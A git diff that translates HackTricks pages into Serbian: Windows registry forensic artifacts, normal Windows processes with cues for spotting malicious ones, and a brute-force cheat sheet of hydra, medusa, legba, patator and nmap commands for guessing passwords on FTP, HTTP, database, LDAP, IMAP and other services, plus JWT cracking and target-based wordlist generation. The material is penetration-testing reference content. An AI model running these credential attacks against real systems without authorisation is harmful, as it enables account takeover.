+- Nalazi se na **`Software\Microsoft\Windows NT\CurrentVersion`**, gde možete pronaći verziju Windows-a, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način.
 
-### **Computer Name**
+### **Ime računara**
 
-- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**.
+- Ime hosta se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**.
 
-### **Time Zone Setting**
+### **Podešavanje vremenske zone**
 
-- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**.
+- Vremenska zona sistema se čuva u **`System\ControlSet001\Control\TimeZoneInformation`**.
 
-### **Access Time Tracking**
+### **Praćenje vremena pristupa**
 
-- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:
-  `fsutil behavior set disablelastaccess 0`
+- Po defaultu, praćenje poslednjeg vremena pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite:
+`fsutil behavior set disablelastaccess 0`
 
-### Windows Versions and Service Packs
+### Verzije Windows-a i Service Pack-ovi
 
-- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.
+- **Verzija Windows-a** označava izdanje (npr. Home, Pro) i njegovu verziju (npr. Windows 10, Windows 11), dok su **Service Pack-ovi** ažuriranja koja uključuju ispravke i, ponekad, nove funkcije.
 
-### Enabling Last Access Time
+### Omogućavanje praćenja poslednjeg vremena pristupa
 
-- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring.
+- Omogućavanje praćenja poslednjeg vremena pristupa omogućava vam da vidite kada su datoteke poslednji put otvorene, što može biti ključno za forenzičku analizu ili praćenje sistema.
 
-### Network Information Details
+### Detalji o mrežnim informacijama
 
-- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions.
+- Registry sadrži opsežne podatke o mrežnim konfiguracijama, uključujući **tipove mreža (bežične, kablovske, 3G)** i **kategorije mreža (Javna, Privatna/Domaća, Domen/Rad)**, što je od vitalnog značaja za razumevanje mrežnih bezbednosnih postavki i dozvola.
 
-### Client Side Caching (CSC)
+### Keširanje na klijentskoj strani (CSC)
 
-- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity.
+- **CSC** poboljšava pristup offline datotekama keširanjem kopija deljenih datoteka. Različita podešavanja **CSCFlags** kontrolišu kako i koje datoteke se keširaju, utičući na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom povezanošću.
 
-### AutoStart Programs
+### AutoStart programi
 
-- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software.
+- Programi navedeni u raznim `Run` i `RunOnce` registry ključevima automatski se pokreću prilikom pokretanja, utičući na vreme podizanja sistema i potencijalno predstavljajući tačke interesa za identifikaciju malvera ili neželjenog softvera.
 
 ### Shellbags
 
-- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means.
+- **Shellbags** ne samo da čuvaju podešavanja za prikaz foldera, već takođe pružaju forenzičke dokaze o pristupu folderima čak i ako folder više ne postoji. Oni su neprocenjivi za istrage, otkrivajući aktivnost korisnika koja nije očigledna kroz druge načine.
 
-### USB Information and Forensics
+### USB informacije i forenzika
 
-- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents.
+- Detalji o USB uređajima pohranjeni u registry-ju mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa osetljivim prenosima datoteka ili incidentima neovlašćenog pristupa.
 
-### Volume Serial Number
+### Serijski broj volumena
 
-- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices.
+- **Serijski broj volumena** može biti ključan za praćenje specifične instance datotečnog sistema, koristan u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke preko različitih uređaja.
 
-### **Shutdown Details**
+### **Detalji o gašenju**
 
-- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**.
+- Vreme gašenja i broj gašenja (potonji samo za XP) se čuvaju u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**.
 
-### **Network Configuration**
+### **Mrežna konfiguracija**
 
-- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
-- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
+- Za detaljne informacije o mrežnim interfejsima, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
+- Prva i poslednja vremena mrežne veze, uključujući VPN veze, beleže se pod raznim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
 
-### **Shared Folders**
+### **Deljeni folderi**
 
-- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability.
+- Deljeni folderi i podešavanja su pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Podešavanja za keširanje na klijentskoj strani (CSC) određuju dostupnost offline datoteka.
 
-### **Programs that Start Automatically**
+### **Programi koji se automatski pokreću**
 
-- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup.
+- Putanje kao što su **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe postavljene da se pokreću prilikom pokretanja.
 
-### **Searches and Typed Paths**
+### **Pretrage i unesene putanje**
 
-- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively.
+- Pretrage u Explorer-u i unesene putanje se prate u registry-ju pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, respektivno.
 
-### **Recent Documents and Office Files**
+### **Nedavni dokumenti i Office datoteke**
 
-- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths.
+- Nedavni dokumenti i Office datoteke koje su pristupane beleže se u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama verzije Office-a.
 
-### **Most Recently Used (MRU) Items**
+### **Najčešće korišćeni (MRU) stavke**
 
-- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`.
+- MRU liste, koje ukazuju na nedavne putanje datoteka i komande, čuvaju se u raznim `ComDlg32` i `Explorer` podključevima pod `NTUSER.DAT`.
 
-### **User Activity Tracking**
+### **Praćenje aktivnosti korisnika**
 
-- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
+- Funkcija User Assist beleži detaljne statistike korišćenja aplikacija, uključujući broj pokretanja i vreme poslednjeg pokretanja, na **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
 
-### **Shellbags Analysis**
+### **Analiza Shellbags**
 
-- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis.
+- Shellbags, koji otkrivaju detalje o pristupu folderima, čuvaju se u `USRCLASS.DAT` i `NTUSER.DAT` pod `Software\Microsoft\Windows\Shell`. Koristite **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** za analizu.
 
-### **USB Device History**
+### **Istorija USB uređaja**
 
-- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps.
-- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**.
-- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively.
+- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** i **`HKLM\SYSTEM\ControlSet001\Enum\USB`** sadrže bogate detalje o povezanim USB uređajima, uključujući proizvođača, naziv proizvoda i vremenske oznake povezivanja.
+- Korisnik povezan sa specifičnim USB uređajem može se precizno odrediti pretraživanjem `NTUSER.DAT` hives za **{GUID}** uređaja.
+- Poslednji montirani uređaj i njegov serijski broj volumena mogu se pratiti kroz `System\MountedDevices` i `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respektivno.
 
-This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability.
+Ovaj vodič sažima ključne putanje i metode za pristup detaljnim informacijama o sistemu, mreži i aktivnostima korisnika na Windows sistemima, sa ciljem jasnoće i upotrebljivosti.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
index 06f914970..a06fe2426 100644
--- a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
+++ b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
@@ -2,105 +2,105 @@
 
 ## smss.exe
 
-**Session Manager**.\
-Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree.
+**Menadžer sesije**.\
+Sesija 0 pokreće **csrss.exe** i **wininit.exe** (**OS** **usluge**) dok Sesija 1 pokreće **csrss.exe** i **winlogon.exe** (**Korisnička** **sesija**). Međutim, trebali biste videti **samo jedan proces** tog **binarija** bez dece u stablu procesa.
 
-Also, sessions apart from 0 and 1 may mean that RDP sessions are occurring.
+Takođe, sesije osim 0 i 1 mogu značiti da se odvijaju RDP sesije.
 
 ## csrss.exe
 
-**Client/Server Run Subsystem Process**.\
-It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps drive letters**, create **temp files**, and handles the **shutdown** **process**.
+**Klijent/Server Run Subsystem Process**.\
+Upravlja **procesima** i **nitima**, omogućava **Windows** **API** za druge procese i takođe **mapira slova drajvova**, kreira **temp fajlove** i upravlja **procesom gašenja**.
 
-There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree). Another one is created **per new Session**.
+Postoji jedan **koji se izvršava u Sesiji 0 i još jedan u Sesiji 1** (tako da **2 procesa** u stablu procesa). Još jedan se kreira **po novoj Sesiji**.
 
 ## winlogon.exe
 
 **Windows Logon Process**.\
-It's responsible for user **logon**/**logoffs**. It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them.
+Odgovoran je za korisnički **prijavu**/**odjavu**. Pokreće **logonui.exe** da zatraži korisničko ime i lozinku, a zatim poziva **lsass.exe** da ih verifikuje.
 
-Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**.
+Zatim pokreće **userinit.exe** koji je naveden u **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** sa ključem **Userinit**.
 
-Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**.
+Pored toga, prethodni registar bi trebao imati **explorer.exe** u **Shell ključu** ili bi mogao biti zloupotrebljen kao **metoda postojanosti malvera**.
 
 ## wininit.exe
 
 **Windows Initialization Process**. \
-It launches **services.exe**, **lsass.exe**, and **lsm.exe** in Session 0. There should only be 1 process.
+Pokreće **services.exe**, **lsass.exe**, i **lsm.exe** u Sesiji 0. Trebalo bi da postoji samo 1 proces.
 
 ## userinit.exe
 
 **Userinit Logon Application**.\
-Loads the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**.
+Učitava **ntduser.dat u HKCU** i inicijalizuje **korisničko** **okruženje** i pokreće **logon** **skripte** i **GPO**.
 
-It launches **explorer.exe**.
+Pokreće **explorer.exe**.
 
 ## lsm.exe
 
-**Local Session Manager**.\
-It works with smss.exe to manipulate user sessions: Logon/logoff, shell start, lock/unlock desktop, etc.
+**Menadžer lokalnih sesija**.\
+Radi sa smss.exe da manipuliše korisničkim sesijama: Prijava/odjava, pokretanje shell-a, zaključavanje/otključavanje radne površine, itd.
 
-After W7 lsm.exe was transformed into a service (lsm.dll).
+Nakon W7, lsm.exe je transformisan u uslugu (lsm.dll).
 
-There should only be 1 process in W7 and from them a service running the DLL.
+Trebalo bi da postoji samo 1 proces u W7 i od njih usluga koja pokreće DLL.
 
 ## services.exe
 
-**Service Control Manager**.\
-It **loads** **services** configured as **auto-start** and **drivers**.
+**Menadžer kontrole usluga**.\
+**Učitava** **usluge** konfigurirane kao **automatski start** i **drajvere**.
 
-It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more.
+To je roditeljski proces **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** i mnoge druge.
 
-Services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe.
+Usluge su definisane u `HKLM\SYSTEM\CurrentControlSet\Services` i ovaj proces održava bazu podataka u memoriji o informacijama o uslugama koje se mogu upititi putem sc.exe.
 
-Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**.
+Obratite pažnju kako će **neke** **usluge** raditi u **svojim procesima**, dok će druge **deliti svchost.exe proces**.
 
-There should only be 1 process.
+Trebalo bi da postoji samo 1 proces.
 
 ## lsass.exe
 
-**Local Security Authority Subsystem**.\
-It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`.
+**Podsystem lokalne bezbednosti**.\
+Odgovoran je za **autentifikaciju** korisnika i kreira **bezbednosne** **tokene**. Koristi pakete autentifikacije smeštene u `HKLM\System\CurrentControlSet\Control\Lsa`.
 
-It writes to the **Security** **event** **log** and there should only be 1 process.
+Piše u **log** **događaja** **bezbednosti** i trebalo bi da postoji samo 1 proces.
 
-Keep in mind that this process is highly attacked to dump passwords.
+Imajte na umu da je ovaj proces često napadnut da bi se iskopirali lozinke.
 
 ## svchost.exe
 
-**Generic Service Host Process**.\
-It hosts multiple DLL services in one shared process.
+**Generički proces hosta usluga**.\
+Hostuje više DLL usluga u jednom deljenom procesu.
 
-Usually, you will find that **svchost.exe** is launched with the `-k` flag. This will launch a query to the registry **HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process.
+Obično ćete naći da je **svchost.exe** pokrenut sa `-k` oznakom. Ovo će pokrenuti upit u registru **HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** gde će biti ključ sa argumentom pomenutim u -k koji će sadržati usluge koje treba pokrenuti u istom procesu.
 
-For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
+Na primer: `-k UnistackSvcGroup` će pokrenuti: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
 
-If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument.
+Ako se **oznaka `-s`** takođe koristi sa argumentom, tada se svchost traži da **pokrene samo određenu uslugu** u ovom argumentu.
 
-There will be several processes of `svchost.exe`. If any of them is **not using the `-k` flag**, then that's very suspicious. If you find that **services.exe is not the parent**, that's also very suspicious.
+Biće nekoliko procesa `svchost.exe`. Ako nijedan od njih **ne koristi `-k` oznaku**, to je veoma sumnjivo. Ako otkrijete da **services.exe nije roditelj**, to je takođe veoma sumnjivo.
 
 ## taskhost.exe
 
-This process act as a host for processes running from DLLs. It also loads the services that are running from DLLs.
+Ovaj proces deluje kao host za procese koji se izvršavaju iz DLL-ova. Takođe učitava usluge koje se izvršavaju iz DLL-ova.
 
-In W8 this is called taskhostex.exe and in W10 taskhostw.exe.
+U W8 ovo se zove taskhostex.exe, a u W10 taskhostw.exe.
 
 ## explorer.exe
 
-This is the process responsible for the **user's desktop** and launching files via file extensions.
+Ovo je proces odgovoran za **radnu površinu korisnika** i pokretanje fajlova putem ekstenzija fajlova.
 
-**Only 1** process should be spawned **per logged on user.**
+**Samo 1** proces bi trebao biti pokrenut **po prijavljenom korisniku.**
 
-This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process.
+Ovo se pokreće iz **userinit.exe** koji bi trebao biti prekinut, tako da **nema roditelja** za ovaj proces.
 
-# Catching Malicious Processes
+# Hvatanje zlonamernih procesa
 
-- Is it running from the expected path? (No Windows binaries run from temp location)
-- Is it communicating with weird IPs?
-- Check digital signatures (Microsoft artifacts should be signed)
-- Is it spelled correctly?
-- Is running under the expected SID?
-- Is the parent process the expected one (if any)?
-- Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?)
+- Da li se pokreće iz očekivane putanje? (Nijedna Windows binarna datoteka se ne pokreće iz temp lokacije)
+- Da li komunicira sa čudnim IP-ovima?
+- Proverite digitalne potpise (Microsoft artefakti bi trebali biti potpisani)
+- Da li je pravilno napisano?
+- Da li se izvršava pod očekivanim SID-om?
+- Da li je roditeljski proces očekivani (ako postoji)?
+- Da li su procesi dece oni koje očekujete? (nema cmd.exe, wscript.exe, powershell.exe..?)
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-hacking/brute-force.md b/src/generic-hacking/brute-force.md
index 9b2faa122..54b636ba1 100644
--- a/src/generic-hacking/brute-force.md
+++ b/src/generic-hacking/brute-force.md
@@ -1,18 +1,10 @@
 # Brute Force - CheatSheet
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
-
 {{#include ../banners/hacktricks-training.md}}
 
 ## Default Credentials
 
-**Search in google** for default credentials of the technology that is being used, or **try these links**:
+**Pretražite na google-u** za podrazumevane akreditive tehnologije koja se koristi, ili **probajte ove linkove**:
 
 - [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
 - [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
@@ -27,12 +19,11 @@ Get Access Today:
 - [**https://many-passwords.github.io/**](https://many-passwords.github.io)
 - [**https://theinfocentric.com/**](https://theinfocentric.com/)
 
-## **Create your own Dictionaries**
+## **Kreirajte svoje rečnike**
 
-Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
+Pronađite što više informacija o meti što možete i generišite prilagođeni rečnik. Alati koji mogu pomoći:
 
 ### Crunch
-
 ```bash
 crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
 crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@@ -43,36 +34,30 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars
 ^ Special characters including spac
 crunch 6 8 -t ,@@^^%%
 ```
-
 ### Cewl
-
 ```bash
 cewl example.com -m 5 -w words.txt
 ```
-
 ### [CUPP](https://github.com/Mebus/cupp)
 
-Generate passwords based on your knowledge of the victim (names, dates...)
-
+Generišite lozinke na osnovu vašeg znanja o žrtvi (imena, datumi...)
 ```
 python3 cupp.py -h
 ```
-
 ### [Wister](https://github.com/cycurity/wister)
 
-A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.
-
+Alat za generisanje rečnika, koji vam omogućava da navedete skup reči, dajući vam mogućnost da kreirate više varijacija od datih reči, stvarajući jedinstven i idealan rečnik za korišćenje u vezi sa specifičnim ciljem.
 ```bash
 python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
 
- __          _______  _____ _______ ______ _____
- \ \        / /_   _|/ ____|__   __|  ____|  __ \
-  \ \  /\  / /  | | | (___    | |  | |__  | |__) |
-   \ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
-    \  /\  /   _| |_ ____) |  | |  | |____| | \ \
-     \/  \/   |_____|_____/   |_|  |______|_|  \_\
+__          _______  _____ _______ ______ _____
+\ \        / /_   _|/ ____|__   __|  ____|  __ \
+\ \  /\  / /  | | | (___    | |  | |__  | |__) |
+\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
+\  /\  /   _| |_ ____) |  | |  | |____| | \ \
+\/  \/   |_____|_____/   |_|  |______|_|  \_\
 
-      Version 1.0.3                    Cycurity
+Version 1.0.3                    Cycurity
 
 Generating wordlist...
 [########################################] 100%
@@ -80,10 +65,9 @@ Generated 67885 lines.
 
 Finished in 0.920s.
 ```
-
 ### [pydictor](https://github.com/LandGrey/pydictor)
 
-### Wordlists
+### Liste reči
 
 - [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
 - [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
@@ -96,20 +80,11 @@ Finished in 0.920s.
 - [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
 - [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
 
-

+## Usluge
 
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
-
-## Services
-
-Ordered alphabetically by service name.
+Poređano abecedno po imenu usluge.
 
 ### AFP
-
 ```bash
 nmap -p 548 --script afp-brute 
 msf> use auxiliary/scanner/afp/afp_login
@@ -119,114 +94,84 @@ msf> set PASS_FILE 
 msf> set USER_FILE 
 msf> run
 ```
-
 ### AJP
-
 ```bash
 nmap --script ajp-brute -p 8009 
 ```
-
-## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
-
+## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM i Solace)
 ```bash
 legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
 ```
-
-### Cassandra
-
+### Касандра
 ```bash
 nmap --script cassandra-brute -p 9160 
 # legba ScyllaDB / Apache Casandra
 legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
 ```
-
 ### CouchDB
-
 ```bash
 msf> use auxiliary/scanner/couchdb/couchdb_login
 hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
 ```
-
 ### Docker Registry
-
 ```
 hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
 ```
-
 ### Elasticsearch
-
 ```
 hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
 ```
-
 ### FTP
-
 ```bash
 hydra -l root -P passwords.txt [-t 32]  ftp
 ncrack -p 21 --user root -P passwords.txt  [-T 5]
 medusa -u root -P 500-worst-passwords.txt -h  -M ftp
 legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
 ```
-
-### HTTP Generic Brute
+### HTTP Generički Brute
 
 #### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
 
-### HTTP Basic Auth
-
+### HTTP Osnovna Autentifikacija
 ```bash
 hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
 # Use https-get mode for https
 medusa -h  -u  -P   -M  http -m DIR:/path/to/auth -T 10
 legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
 ```
-
 ### HTTP - NTLM
-
 ```bash
 legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
 legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
 ```
-
-### HTTP - Post Form
-
+### HTTP - Post Forma
 ```bash
 hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
 # Use https-post-form mode for https
 ```
+Za http**s** morate promeniti "http-post-form" u "**https-post-form"**
 
-For http**s** you have to change from "http-post-form" to "**https-post-form"**
-
-### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle
-
+### **HTTP - CMS --** (W)ordpress, (J)oomla ili (D)rupal ili (M)oodle
 ```bash
 cmsmap -f W/J/D/M -u a -p a https://wordpress.com
 # Check also https://github.com/evilsocket/legba/wiki/HTTP
 ```
-
 ### IMAP
-
 ```bash
 hydra -l USERNAME -P /path/to/passwords.txt -f  imap -V
 hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f  imap -V
 nmap -sV --script imap-brute -p  
 legba imap --username user --password data/passwords.txt --target localhost:993
 ```
-
 ### IRC
-
 ```bash
 nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p  
 ```
-
 ### ISCSI
-
 ```bash
 nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 
 ```
-
 ### JWT
-
 ```bash
 #hashcat
 hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
@@ -249,33 +194,25 @@ python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w
 #https://github.com/lmammino/jwt-cracker
 jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
 ```
-
 ### LDAP
-
 ```bash
 nmap --script ldap-brute -p 389 
 legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
 ```
-
 ### MQTT
-
 ```
 ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
 legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
 ```
-
 ### Mongo
-
 ```bash
 nmap -sV --script mongodb-brute -n -p 27017 
 use auxiliary/scanner/mongodb/mongodb_login
 legba mongodb --target localhost:27017 --username root --password data/passwords.txt
 ```
-
 ### MSSQL
 
 [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
-
 ```shell
 # Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
 mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
@@ -296,9 +233,7 @@ mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
 ```bash
 legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
 ```
-
 ### MySQL
-
 ```bash
 # hydra
 hydra -L usernames.txt -P pass.txt  mysql
@@ -312,9 +247,7 @@ medusa -h  -u  -P  <-f | to stop medusa on fir
 #Legba
 legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
 ```
-
 ### OracleSQL
-
 ```bash
 patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
 
@@ -338,21 +271,15 @@ nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= 
 
 legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
 ```
-
-In order to use **oracle_login** with **patator** you need to **install**:
-
+Da biste koristili **oracle_login** sa **patator** potrebno je da **instalirate**:
 ```bash
 pip3 install cx_Oracle --upgrade
 ```
-
-[Offline OracleSQL hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**):
-
+[Offline OracleSQL hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**verzije 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** i **11.2.0.3**):
 ```bash
- nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
